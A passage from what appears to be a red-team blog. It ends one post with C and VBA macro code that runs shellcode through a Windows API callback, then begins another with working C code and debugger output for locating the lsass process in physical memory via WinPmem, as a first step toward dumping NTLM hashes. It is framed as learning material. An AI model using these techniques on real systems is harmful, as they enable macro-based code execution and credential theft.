heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
copied_shellcode = HeapAlloc(heap, 0, 0x10);
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
saAttr.bInheritHandle = TRUE;
saAttr.lpSecurityDescriptor = NULL;
CreatePipe(&sink, &source, &saAttr, 0);
WriteFile(source, orig_shellcode, 4, &size, NULL);
ReadFile(sink, copied_shellcode, 4, &size, NULL);
EnumSystemCodePagesW(copied_shellcode, 0);
return 0;
}
It can be translated to VBA as:
Private Declare PtrSafe Function HeapCreate Lib "kernel32" (ByVal flOptions As Long, ByVal dwInitialSize As LongPtr, ByVal dwMaximumSize As LongPtr) As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "kernel32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongPtr) As LongPtr
Private Declare PtrSafe Function EnumSystemCodePagesW Lib "kernel32" (ByVal lpCodePageEnumProc As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function CreatePipe Lib "kernel32" (phReadPipe As LongPtr, phWritePipe As LongPtr, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare PtrSafe Function ReadFile Lib "kernel32" (ByVal hFile As LongPtr, ByVal lpBuffer As LongPtr, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As LongPtr) As Long
Private Declare PtrSafe Function WriteFile Lib "kernel32" (ByVal hFile As LongPtr, ByVal lpBuffer As LongPtr, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As LongPtr) As Long
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As LongPtr
bInheritHandle As Long
End Type
Sub poc()
Dim orig_shellcode(0 To 3) As Byte
Dim copied_shellcode As LongPtr
Dim heap As LongPtr
Dim size As Long
Dim ret As Long
Dim source As LongPtr
Dim sink As LongPtr
Dim saAttr As SECURITY_ATTRIBUTES
Dim HEAP_CREATE_ENABLE_EXECUTE As Long
HEAP_CREATE_ENABLE_EXECUTE = &H40000
orig_shellcode(0) = &HCC
orig_shellcode(1) = &HCC
orig_shellcode(2) = &HCC
orig_shellcode(3) = &HCC
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0)
copied_shellcode = HeapAlloc(heap, 0, &H10)
saAttr.nLength = LenB(saAttr)
saAttr.bInheritHandle = 1
saAttr.lpSecurityDescriptor = 0
ret = CreatePipe(sink, source, saAttr, 0)
ret = WriteFile(source, VarPtr(orig_shellcode(0)), 4, size, 0)
ret = ReadFile(sink, copied_shellcode, 4, size, 0)
ret = EnumSystemCodePagesW(copied_shellcode, 0)
End Sub
Although the topic discussed in this article is old, we tend to see the same patterns over and over (probably just because people repeat what is widely shared on the internet). We encourage you to explore alternative ways of doing things and not just blindly follow what others do.
As Red Teamers we have to replicate TTPs seen in the wild, but we also need to explore other paths. There are dozens of ways to copy and trigger your shellcode, so don’t stick to just one and be creative!
We hope you enjoyed this reading! Feel free to give us feedback at our Twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how one of our owls began his own quest through the lands of physical memory to find the credentials keys to paradise. Please, take a seat and listen to the story.
Our knowledge about the topic discussed in this article is limited; as we stated in the title, we did this work just for learning purposes. If you spot errors or misconceptions, please ping us on Twitter so we can fix them. For more accurate information (and deeper explanations), please check the book “Windows Internals” (Pavel Yosifovich, Alex Ionescu, Mark E. Russinovich & David A. Solomon). Well-known forensic tools are also a good source of information (for example Volatility).
Another important thing to keep in mind: the Windows version used here is Windows 10 2009 20H2 (October 2020 Update).
Hunting for juicy information inside dumps of physical memory is something that regular forensic tools do by default. Even game cheaters have explored this route in the past to build wallhacks: read physical memory, find the desired game process and look for the player information structs.
From a Red Teaming/Pentesting perspective, this approach has also been explored in order to obtain credentials from the lsass process on live machines during engagements. For example, in 2020 F-Secure published an article titled “Rethinking credential theft” and released a tool called “PhysMem2Profit”.
In their article/tool they use the WinPmem driver to read physical memory (a vulnerable driver with a read primitive would work too), creating a bridge with sockets between the target machine and the pentester machine, so that they can create a minidump of the lsass process that is compatible with Mimikatz with the help of Rekall.
The steps they follow are:
In our humble opinion, this approach is too convoluted and contains unnecessary steps. Creating a socket between the two machines does not look right to us either. So… here comes our idea: let’s try to loot lsass from physical memory while staying on the same machine and WITHOUT external tools (like they did with Rekall). It is a good opportunity to learn new things!
As in any quest, we first need a map and a compass to find the treasure, because the land of physical memory is dangerous and full of terrors. We can read arbitrary physical memory with WinPmem or a vulnerable driver with a read primitive, but… how can we find the process memory? Well, our map is the AVL-tree that contains the VADs info and our compass is the EPROCESS struct. Let’s explain this!
The Memory Manager needs to keep track of which virtual addresses have been reserved in the process’ address space. This information is contained in structs called “VAD” (Virtual Address Descriptor) and they are placed inside an AVL-tree (an AVL-tree is a self-balancing binary search tree). The tree is our map: if we find the tree’s first node we can start to walk it and retrieve all the VADs, and consequently we would get the knowledge of how the process memory is distributed (also, the VAD provides more useful information as we are going to see later).
But… how can we find this tree? Well, we need the compass. And our compass is the EPROCESS. This structure contains a pointer to the tree (field VadRoot) and the number of nodes (VadCount):
//0xa40 bytes (sizeof)
struct _EPROCESS
{
struct _KPROCESS Pcb; //0x0
struct _EX_PUSH_LOCK ProcessLock; //0x438
VOID* UniqueProcessId; //0x440
struct _LIST_ENTRY ActiveProcessLinks; //0x448
struct _EX_RUNDOWN_REF RundownProtect; //0x458
//(...)
struct _RTL_AVL_TREE VadRoot; //0x7d8
VOID* VadHint; //0x7e0
ULONGLONG VadCount; //0x7e8
//(...)
Finding this structure in physical memory is easy. In the article “CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver”, @Jackson_T uses a mask to find this structure. As we know some data (like the PID, the process name or the Priority value) we can use this as a signature and search the whole physical memory until we match it.
We’ll know the name and PID for each process we’re targeting, so the UniqueProcessId and ImageFileName fields should be good candidates. Problem is that we won’t be able to accurately predict the values for every field between them. Instead, we can define two needles: one that has ImageFileName and another that has UniqueProcessId. We can see that their corresponding byte buffers have predictable outputs. (From Jackson_T post)
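So, we can search for our needles and then apply relative offsets to read the fields that we are interested in. In the code below the needle matches ImageFileName, which the code takes to be at offset 0x5a8 of the EPROCESS on this build, so the PID (0x440) is found 0x168 bytes before the match and the start of the structure 0x5a8 bytes before it: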
int main(int argc, char** argv) {
WINPMEM_MEMORY_INFO info;
DWORD size;
BOOL result = FALSE;
int i = 0;
LARGE_INTEGER large_start;
DWORD found = 0;
printf("[+] Getting WinPmem handle...\t");
pmem_fd = CreateFileA("\\\\.\\pmem",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (pmem_fd == INVALID_HANDLE_VALUE) {
printf("ERROR!\n");
return -1;
}
printf("OK!\n");
RtlZeroMemory(&info, sizeof(WINPMEM_MEMORY_INFO));
printf("[+] Getting memory info...\t");
result = DeviceIoControl(pmem_fd, IOCTL_GET_INFO,
NULL, 0, // in
(char*)&info, sizeof(WINPMEM_MEMORY_INFO), // out
&size, NULL);
if (!result) {
printf("ERROR!\n");
return -1;
}
printf("OK!\n");
printf("[+] Memory Info:\n");
printf("\t[-] Total ranges: %lld\n", info.NumberOfRuns.QuadPart);
for (i = 0; i < info.NumberOfRuns.QuadPart; i++) {
printf("\t\tStart 0x%08llX - Length 0x%08llx\n", info.Run[i].BaseAddress.QuadPart, info.Run[i].NumberOfBytes.QuadPart);
max_physical_memory = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart;
}
printf("\t[-] Max physical memory 0x%08llx\n", max_physical_memory);
printf("[+] Scanning memory... ");
for (i = 0; i < info.NumberOfRuns.QuadPart; i++) {
start = info.Run[i].BaseAddress.QuadPart;
end = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart;
while (start < end) {
unsigned char* largebuffer = (unsigned char*)malloc(BUFF_SIZE);
DWORD to_write = (DWORD)min((BUFF_SIZE), end - start);
DWORD bytes_read = 0;
DWORD bytes_written = 0;
large_start.QuadPart = start;
result = SetFilePointerEx(pmem_fd, large_start, NULL, FILE_BEGIN);
if (!result) {
printf("[!] ERROR! (SetFilePointerEx)\n");
}
result = ReadFile(pmem_fd, largebuffer, to_write, &bytes_read, NULL);
EPROCESS_NEEDLE needle_root_process = {"lsass.exe"};
PBYTE needle_buffer = (PBYTE)malloc(sizeof(EPROCESS_NEEDLE));
memcpy(needle_buffer, &needle_root_process, sizeof(EPROCESS_NEEDLE));
int offset = 0;
offset = memmem((PBYTE)largebuffer, bytes_read, needle_buffer, sizeof(EPROCESS_NEEDLE)); // memmem() is the same used by Jackson_T in his post
if (offset >= 0) {
if (largebuffer[offset + 15] == 2) { //Priority Check
if (largebuffer[offset - 0x168] == 0x70 && largebuffer[offset - 0x167] == 0x02) { //PID check, hardcoded for PoC, we can take in runtime but... too lazy :P
printf("signature match at 0x%08llx!\n", offset + start);
printf("[+] EPROCESS is at 0x%08llx [PHYSICAL]\n", offset - 0x5a8 + start);
memcpy(&DirectoryTableBase, largebuffer + offset - 0x5a8 + 0x28, sizeof(ULONGLONG));
printf("\t[*] DirectoryTableBase: 0x%08llx\n", DirectoryTableBase);
printf("\t[*] VadRoot is at 0x%08llx [PHYSICAL]\n", start + offset - 0x5a8 + 0x7d8);
memcpy(&VadRootPointer, largebuffer + offset - 0x5a8 + 0x7d8, sizeof(ULONGLONG));
VadRootPointer = VadRootPointer;
printf("\t[*] VadRoot points to 0x%08llx [VIRTUAL]\n", VadRootPointer);
memcpy(&VadCount, largebuffer + offset - 0x5a8 + 0x7e8, sizeof(ULONGLONG));
printf("\t[*] VadCount is %lld\n", VadCount);
free(needle_buffer);
free(largebuffer);
found = 1;
break;
}
}
}
start += bytes_read;
free(needle_buffer);
free(largebuffer);
}
if (found != 0) {
break;
}
}
return 0;
}
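The listing above relies on a memmem() helper that is not shown and that the Windows C runtime does not provide. A minimal sketch of such a byte search follows, assuming (as the caller does) that it returns the offset of the first match or -1 when there is none. The name find_bytes is ours, chosen to avoid clashing with any existing memmem.

```c
#include <stddef.h>
#include <string.h>

/* Return the offset of the first occurrence of needle inside haystack,
   or -1 if it is not present (or if the needle is empty or too long). */
long long find_bytes(const unsigned char *haystack, size_t hay_len,
                     const unsigned char *needle, size_t needle_len) {
    if (needle_len == 0 || needle_len > hay_len) {
        return -1;
    }
    for (size_t i = 0; i + needle_len <= hay_len; i++) {
        /* Cheap first-byte check before the full comparison */
        if (haystack[i] == needle[0] &&
            memcmp(haystack + i, needle, needle_len) == 0) {
            return (long long)i;
        }
    }
    return -1;
}
```

Note that a helper like this only reports the first hit in each buffer. If that first hit fails the priority or PID checks, later hits in the same buffer are never examined, so a more robust scanner would resume the search right after each rejected match.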
And here is the output:
[+] Getting WinPmem handle... OK!
[+] Getting memory info... OK!
[+] Memory Info:
[-] Total ranges: 4
Start 0x00001000 - Length 0x0009e000
Start 0x00100000 - Length 0x00002000
Start 0x00103000 - Length 0xdfeed000
Start 0x100000000 - Length 0x20000000
[-] Max physical memory 0x120000000
[+] Scanning memory... signature match at 0x271c3628!
[+] EPROCESS is at 0x271c3080 [PHYSICAL]
[*] DirectoryTableBase: 0x29556000
[*] VadRoot is at 0x271c3858 [PHYSICAL]
[*] VadRoot points to 0xffffa48bb0147290 [VIRTUAL]
[*] VadCount is 165
Maybe you are wondering why we are interested in the DirectoryTableBase field. The thing is: from our point of view we can only work with physical memory; we do not “understand” what a virtual address is, because to us they are “out of context”. We know about physical memory and offsets, not about virtual addresses bound to a process. But we are going to deal with pointers to virtual memory, so we need a way to translate them, and DirectoryTableBase gives us the physical address of the process’ top-level page table, which is where that translation starts.
I like to compare virtual addresses with the call numbers used in libraries to locate a book, where the first digits indicate the hall, the next ones the bookshelf, then the column and finally the shelf where the book lies.
Our virtual address is in some way just like the library code: it contains different indexes. Instead of talking about halls, columns or shelves, we have Page-Map-Level4 (PML4E), Page-Directory-Pointer (PDPE), Page-Directory (PDE), Page-Table (PTE) and the Page Physical Offset.
Those are the page levels for a 4KB page; for a 2MB page we have PML4E, PDPE, PDE and the offset. We can verify this information using kd and the command !vtop with different processes:
For 4KB (Base 0x26631000, virtual address to translate 0xffffc987034fd330):
lkd> !vtop 26631000 0xffffc987034fd330
Amd64VtoP: Virt ffffc987034fd330, pagedir 0000000026631000
Amd64VtoP: PML4E 0000000026631c98
Amd64VtoP: PDPE 00000000046320e0
Amd64VtoP: PDE 0000000100a1c0d0
Amd64VtoP: PTE 000000001fa3f7e8
Amd64VtoP: Mapped phys 0000000026da8330
Virtual address ffffc987034fd330 translates to physical address 26da8330.
For 2MB (Base 0x1998D000, virtual address to translate 0xffffaa83f4b35640):
lkd> !vtop 1998D000 ffffaa83f4b35640
Amd64VtoP: Virt ffffaa83f4b35640, pagedir 000000001998d000
Amd64VtoP: PML4E 000000001998daa8
Amd64VtoP: PDPE 0000000004631078
Amd64VtoP: PDE 0000000004734d28
Amd64VtoP: Large page mapped phys 0000000108d35640
Virtual address ffffaa83f4b35640 translates to physical address 108d35640.
What is it doing under the hood? If you turn the virtual address into its binary representation, you can split it into the indexes of each page level. So, imagine we want to translate the virtual address 0xffffa48bb0147290 and the process page base is 0x29556000 (let’s assume it is a 4KB page, later we will explain how to know it).
lkd> .formats ffffa48bb0147290
Evaluate expression:
Hex: ffffa48b`b0147290
Decimal: -100555115171184
Octal: 1777775110566005071220
Binary: 11111111 11111111 10100100 10001011 10110000 00010100 01110010 10010000
Chars: ......r.
Time: ***** Invalid FILETIME
Float: low -5.40049e-010 high -1.#QNAN
Double: -1.#QNAN
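Now we can split the bits in chunks, reading from the right: 12 bits for the Page Physical Offset, 9 for the PTE, 9 for the PDE, 9 for the PDPE and 9 for the PML4E. The 16 leftmost bits are only a sign extension and are not used as an index: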
1111111111111111 101001001 000101110 110000000 101000111 001010010000
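The same split can be done with shifts and masks instead of reading the binary by eye. This is a small sketch for the 4KB case only; the struct and function names (va_indexes, split_va) are ours.

```c
#include <stdint.h>

/* Indexes encoded in a 48-bit x64 virtual address (4KB pages). */
typedef struct {
    unsigned pml4;    /* bits 47..39 */
    unsigned pdpt;    /* bits 38..30 */
    unsigned pd;      /* bits 29..21 */
    unsigned pt;      /* bits 20..12 */
    unsigned offset;  /* bits 11..0  */
} va_indexes;

va_indexes split_va(uint64_t va) {
    va_indexes ix;
    ix.pml4   = (unsigned)((va >> 39) & 0x1FF);
    ix.pdpt   = (unsigned)((va >> 30) & 0x1FF);
    ix.pd     = (unsigned)((va >> 21) & 0x1FF);
    ix.pt     = (unsigned)((va >> 12) & 0x1FF);
    ix.offset = (unsigned)(va & 0xFFF);
    return ix;
}
```

For 0xffffa48bb0147290 this yields 0x149, 0x2e, 0x180, 0x147 and 0x290, which are the five chunks shown above written in hexadecimal.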
Next we are going to take the chunk for PML4E and multiply by 0x8:
lkd> .formats 0y101001001
Evaluate expression:
Hex: 00000000`00000149
Decimal: 329
Octal: 0000000000000000000511
Binary: 00000000 00000000 00000000 00000000 00000000 00000000 00000001 01001001
Chars: .......I
Time: Thu Jan 1 01:05:29 1970
Float: low 4.61027e-043 high 0
Double: 1.62548e-321
0x149 * 0x8 = 0xa48
Now we can use it as an offset: just add this value to the page base (0x29556000 + 0xa48 = 0x29556a48). Next, read the physical memory at that location:
lkd> !dq 29556a48
#29556a48 0a000000`04632863 00000000`00000000
#29556a58 00000000`00000000 00000000`00000000
#29556a68 00000000`00000000 00000000`00000000
#29556a78 00000000`00000000 00000000`00000000
#29556a88 00000000`00000000 00000000`00000000
#29556a98 00000000`00000000 00000000`00000000
#29556aa8 00000000`00000000 00000000`00000000
#29556ab8 00000000`00000000 00000000`00000000
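The first quadword is the PML4 entry. Keep only the physical page frame: clear the last 3 hex digits (the low 12 bits are flags) and drop the bits above bit 51 (the leading 0x0a here), which are not part of the address either. That leaves 0x4632000. Now repeat the operation of multiplying the next chunk of bits: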
kd> .formats 0y000101110
Evaluate expression:
Hex: 00000000`0000002e
Decimal: 46
Octal: 0000000000000000000056
Binary: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00101110
Chars: ........
Time: Thu Jan 1 01:00:46 1970
Float: low 6.44597e-044 high 0
Double: 2.2727e-322
So… 0x4632000 + (0x2e * 0x8) == 0x4632170. Read the physical memory at this point:
lkd> !dq 4632170
# 4632170 0a000000`04735863 00000000`00000000
# 4632180 00000000`00000000 00000000`00000000
# 4632190 00000000`00000000 00000000`00000000
# 46321a0 00000000`00000000 00000000`00000000
# 46321b0 00000000`00000000 00000000`00000000
# 46321c0 00000000`00000000 00000000`00000000
# 46321d0 00000000`00000000 00000000`00000000
# 46321e0 00000000`00000000 00000000`00000000
Just repeat the same operation until the end (except for the last 12 bits, which are not multiplied by 0x8: they are added as-is to the page frame taken from the PTE) and you have successfully translated your virtual address! Don’t trust me? Check it!
kd> !vtop 0x29556000 0xffffa48bb0147290
Amd64VtoP: Virt ffffa48bb0147290, pagedir 0000000029556000
Amd64VtoP: PML4E 0000000029556a48
Amd64VtoP: PDPE 0000000004632170
Amd64VtoP: PDE 0000000004735c00
Amd64VtoP: PTE 0000000022246a38
Amd64VtoP: Mapped phys 000000001645b290
Virtual address ffffa48bb0147290 translates to physical address 1645b290.
Ta-dá!
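Each step of the walk above is the same two operations: take the page frame out of the entry we just read, then add the next index multiplied by 8. A minimal sketch, with helper names of our own (table_base, entry_address) and the usual x64 assumption that the frame lives in bits 51..12 of the entry:

```c
#include <stdint.h>

/* Bits 51..12 of a paging entry hold the physical frame of the next level. */
#define ENTRY_FRAME_MASK 0x000FFFFFFFFFF000ULL

/* Physical base of the table (or page) an entry points to. */
uint64_t table_base(uint64_t entry) {
    return entry & ENTRY_FRAME_MASK;
}

/* Physical address of the 8-byte entry number `index` inside a table. */
uint64_t entry_address(uint64_t table_phys, unsigned index) {
    return table_phys + (uint64_t)index * 8;
}
```

With the values from the debugger session, entry_address(0x29556000, 0x149) gives 0x29556a48, and feeding the quadword read there (0x0a00000004632863) through table_base and entry_address with index 0x2e gives 0x4632170, matching the PML4E and PDPE lines printed by !vtop.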
Here is a sample function that we are going to use to translate virtual addresses (4KB and 2MB) to physical (ugly as hell, but works):
ULONGLONG v2p(ULONGLONG vaddr) {
BOOL result = FALSE;
DWORD bytes_read = 0;
LARGE_INTEGER PML4E;
LARGE_INTEGER PDPE;
LARGE_INTEGER PDE;
LARGE_INTEGER PTE;
ULONGLONG SIZE = 0;
ULONGLONG phyaddr = 0;
ULONGLONG base = 0;
base = DirectoryTableBase;
PML4E.QuadPart = base + extractBits(vaddr, 9, 39) * 0x8;
//printf("[DEBUG Virtual Address: 0x%08llx]\n", vaddr);
//printf("\t[*] PML4E: 0x%x\n", PML4E.QuadPart);
result = SetFilePointerEx(pmem_fd, PML4E, NULL, FILE_BEGIN);
PDPE.QuadPart = 0;
result = ReadFile(pmem_fd, &PDPE.QuadPart, 7, &bytes_read, NULL);
PDPE.QuadPart = extractBits(PDPE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 30) * 0x8;
//printf("\t[*] PDPE: 0x%08llx\n", PDPE.QuadPart);
result = SetFilePointerEx(pmem_fd, PDPE, NULL, FILE_BEGIN);
PDE.QuadPart = 0;
result = ReadFile(pmem_fd, &PDE.QuadPart, 7, &bytes_read, NULL);
PDE.QuadPart = extractBits(PDE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 21) * 0x8;
//printf("\t[*] PDE: 0x%08llx\n", PDE.QuadPart);
result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN);
PTE.QuadPart = 0;
result = ReadFile(pmem_fd, &SIZE, 8, &bytes_read, NULL);
if (extractBits(SIZE, 1, 7) == 1) { // PS flag (bit 7 of the PDE) set: the entry maps a 2MB page
result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL);
phyaddr = extractBits(phyaddr, 56, 20) * 0x100000 + extractBits(vaddr, 21, 0);
//printf("\t[*] Physical Address: 0x%08llx\n", phyaddr);
return phyaddr;
}
result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN);
PTE.QuadPart = 0;
result = ReadFile(pmem_fd, &PTE.QuadPart, 7, &bytes_read, NULL);
PTE.QuadPart = extractBits(PTE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 12) * 0x8;
//printf("\t[*] PTE: 0x%08llx\n", PTE.QuadPart);
result = SetFilePointerEx(pmem_fd, PTE, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL);
phyaddr = extractBits(phyaddr, 56, 12) * 0x1000 + extractBits(vaddr, 12, 0);
//printf("\t[*] Physical Address: 0x%08llx\n", phyaddr);
return phyaddr;
}
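The v2p function calls an extractBits helper that is not shown. Judging from the call sites, we assume its arguments are (value, number of bits, starting bit), counting from bit 0. A minimal sketch under that assumption, named extract_bits here to make clear it is our reconstruction and not the original helper:

```c
#include <stdint.h>

/* Return `count` bits of `value`, starting at bit `start` (bit 0 = least
   significant). Shifts of 64 or more are avoided because they are undefined
   behaviour in C. */
uint64_t extract_bits(uint64_t value, unsigned count, unsigned start) {
    if (start >= 64 || count == 0) {
        return 0;
    }
    value >>= start;
    if (count >= 64) {
        return value;
    }
    return value & ((1ULL << count) - 1);
}
```

One design remark: asking for 40 bits starting at bit 12 keeps exactly the page frame (bits 51..12), while a wider request such as 56 bits also lets through whatever sits above bit 51 in the bytes that were read.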
Well, now we can work with virtual addresses. Let’s move!
The next task to solve is to walk the AVL tree and extract all the VADs. Let’s check the VadRoot pointer:
lkd> dq ffffa48bb0147290
ffffa48b`b0147290 ffffa48b`b0146c50 ffffa48b`b01493b0
ffffa48b`b01472a0 00000000`00000001 ff643ab1`ff643aa0
ffffa48b`b01472b0 00000000`00000707 00000000`00000000
ffffa48b`b01472c0 00000003`000003a0 00000000`00000000
ffffa48b`b01472d0 00000000`04000000 ffffa48b`b014daa0
ffffa48b`b01472e0 ffffd100`10b56f40 ffffd100`10b56fc8
ffffa48b`b01472f0 ffffa48b`b014da28 ffffa48b`b014da28
ffffa48b`b0147300 ffffa48b`b016e081 00007ff6`43aa5002
The first thing we can see is the pointer to the left node (offset 0x00-0x07) and the pointer to the right node (0x08-0x0f). We have to add them to a queue and check them later, adding their respective children in turn, and repeat this operation in order to walk the whole tree. Also, combining 4 bytes from 0x18 (the low 32 bits of the starting page number) and 1 byte from 0x20 (its high bits) we get the starting address of the described memory region (the ending virtual address is obtained by combining 4 bytes from 0x1c and 1 byte from 0x21). So we can walk the whole tree doing something like:
//(...)
currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer
if (currentNode == 0) {
cursor++;
continue;
}
reader.QuadPart = v2p(currentNode); // Get Physical Address
left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node
queue[last++] = left; //Add the new node
//printf("[<] Left: 0x%08llx\n", left);
reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node
right = readPhysMemPointer(reader); //Save the pointer
queue[last++] = right; //Add the new node
//printf("[>] Right: 0x%08llx\n", right);
// Get the start address
reader.QuadPart = v2p(currentNode + 0x18);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL);
reader.QuadPart = v2p(currentNode + 0x20);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL);
start = (startingVpn << 12) | (startingVpnHigh << 44);
// Get the end address
reader.QuadPart = v2p(currentNode + 0x1c);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL);
reader.QuadPart = v2p(currentNode + 0x21);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL);
end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44));
//(...)
Now we can retrieve all the reserved regions of virtual memory and their limits (starting address and ending address, and by subtraction the size):
[+] Starting to walk _RTL_AVL_TREE...
===================[VAD info]===================
[0] (0xffffa48bb0147290) [0x7ff643aa0000-0x7ff643ab2000] (73728 bytes)
[1] (0xffffa48bb0146c50) [0x1d4d2ef0000-0x1d4d2f0d000] (118784 bytes)
[2] (0xffffa48bb01493b0) [0x7ff845000000-0x7ff845027000] (159744 bytes)
[3] (0xffffa48bb0179300) [0x80cbf00000-0x80cbf80000] (524288 bytes)
[4] (0xffffa48bb01795d0) [0x1d4d36a0000-0x1d4d36a1000] (4096 bytes)
[5] (0xffffa48bb01a1390) [0x7ff844540000-0x7ff84454c000] (49152 bytes)
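The first entry of this listing can be reproduced by hand from the dump of the root node shown earlier: the quadword at 0x18 is ff643ab1`ff643aa0 (starting page number in the low half, ending page number in the high half) and the bytes at 0x20 and 0x21 are both 0x07. A small sketch of the arithmetic, with function names of our own; unlike the snippet above, it joins the high byte to the page number before adding one, which gives the same result here and also behaves if the low 32 bits happen to be 0xffffffff.

```c
#include <stdint.h>

/* First byte of the region: 40-bit page number times the 4KB page size. */
uint64_t vad_start(uint32_t starting_vpn, uint8_t starting_vpn_high) {
    uint64_t vpn = ((uint64_t)starting_vpn_high << 32) | starting_vpn;
    return vpn << 12;
}

/* First byte after the region: the ending page number is inclusive,
   so one page is added before converting to an address. */
uint64_t vad_end(uint32_t ending_vpn, uint8_t ending_vpn_high) {
    uint64_t vpn = ((uint64_t)ending_vpn_high << 32) | ending_vpn;
    return (vpn + 1) << 12;
}
```

With those inputs, vad_start(0xff643aa0, 0x07) is 0x7ff643aa0000 and vad_end(0xff643ab1, 0x07) is 0x7ff643ab2000, a difference of 73728 bytes, as in entry [0].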
But VADs contain other interesting metadata. For example, if the region is reserved for an image file, we can retrieve the path of that file. This is important for us because we want to locate the loaded lsasrv.dll inside the lsass process, since this is where we are going to loot credentials from (imitating Mimikatz’s sekurlsa::msv to get NTLM hashes).
Let’s take a ride through the _MMVAD struct (follow the arrows!):
lkd> dt nt!_mmvad 0xffffe786`ed185cf0
+0x000 Core : _MMVAD_SHORT
+0x040 u2 : <anonymous-tag>
+0x048 Subsection : 0xffffe786`ed185d60 _SUBSECTION <===========
+0x050 FirstPrototypePte : (null)
+0x058 LastContiguousPte : 0x00000002`00000006 _MMPTE
+0x060 ViewLinks : _LIST_ENTRY [ 0x00000006`00000029 - 0x00000000`00000000 ]
+0x070 VadsProcess : 0xffffe786`ed185c70 _EPROCESS
+0x078 u4 : <anonymous-tag>
+0x080 FileObject : 0xffffe786`ed185d98 _FILE_OBJECT
kd> dt nt!_SUBSECTION 0xffffe786`ed185d60
+0x000 ControlArea : 0xffffe786`ed185c70 _CONTROL_AREA <==============================
+0x008 SubsectionBase : 0xffffae0e`cab53f58 _MMPTE
+0x010 NextSubsection : 0xffffe786`ed185d98 _SUBSECTION
+0x018 GlobalPerSessionHead : _RTL_AVL_TREE
+0x018 CreationWaitList : (null)
+0x018 SessionDriverProtos : (null)
+0x020 u : <anonymous-tag>
+0x024 StartingSector : 0x2b
+0x028 NumberOfFullSectors : 0x2c
+0x02c PtesInSubsection : 6
+0x030 u1 : <anonymous-tag>
+0x034 UnusedPtes : 0y000000000000000000000000000000 (0)
+0x034 ExtentQueryNeeded : 0y0
+0x034 DirtyPages : 0y0
lkd> dt nt!_CONTROL_AREA 0xffffe786`ed185c70
+0x000 Segment : 0xffffae0e`ce0c9f50 _SEGMENT
+0x008 ListHead : _LIST_ENTRY [ 0xffffe786`ed1b1210 - 0xffffe786`ed1b1210 ]
+0x008 AweContext : 0xffffe786`ed1b1210 Void
+0x018 NumberOfSectionReferences : 1
+0x020 NumberOfPfnReferences : 0xf
+0x028 NumberOfMappedViews : 1
+0x030 NumberOfUserReferences : 2
+0x038 u : <anonymous-tag>
+0x03c u1 : <anonymous-tag>
+0x040 FilePointer : _EX_FAST_REF <=================
+0x048 ControlAreaLock : 0n0
+0x04c ModifiedWriteCount : 0
+0x050 WaitList : (null)
+0x058 u2 : <anonymous-tag>
+0x068 FileObjectLock : _EX_PUSH_LOCK
+0x070 LockedPages : 1
+0x078 u3 : <anonymous-tag>
So at 0xffffe786ed185c70 plus 0x40 we have a field called FilePointer, which is an _EX_FAST_REF. Its low 4 bits hold a reference count (RefCnt), so in order to retrieve the correct pointer we have to read the value at this position and set the last hex digit to zero:
lkd> dt nt!_EX_FAST_REF 0xffffe786`ed185c70+0x40
+0x000 Object : 0xffffe786`ed19539c Void <=========================== & 0xfffffffffffffff0
+0x000 RefCnt : 0y1100
+0x000 Value : 0xffffe786`ed19539c
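The dt output above shows that Object, RefCnt and Value all share offset 0: on x64 the pointer and a 4-bit counter are packed into the same quadword. Separating them is a single mask, sketched here with function names of our own:

```c
#include <stdint.h>

/* Pointer part of an x64 _EX_FAST_REF value: clear the low 4 bits. */
uint64_t fast_ref_object(uint64_t value) {
    return value & ~0xFULL;
}

/* Reference count stored in the low 4 bits. */
unsigned fast_ref_count(uint64_t value) {
    return (unsigned)(value & 0xF);
}
```

For the value 0xffffe786ed19539c the count is 12 (0y1100 in the debugger output) and the remaining bits are the object pointer.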
So 0xffffe786ed19539c & 0xfffffffffffffff0 is 0xffffe786ed195390, which is a pointer to a _FILE_OBJECT struct:
lkd> dt nt!_FILE_OBJECT 0xffffe786`ed195390
+0x000 Type : 0n5
+0x002 Size : 0n216
+0x008 DeviceObject : 0xffffe786`e789c060 _DEVICE_OBJECT
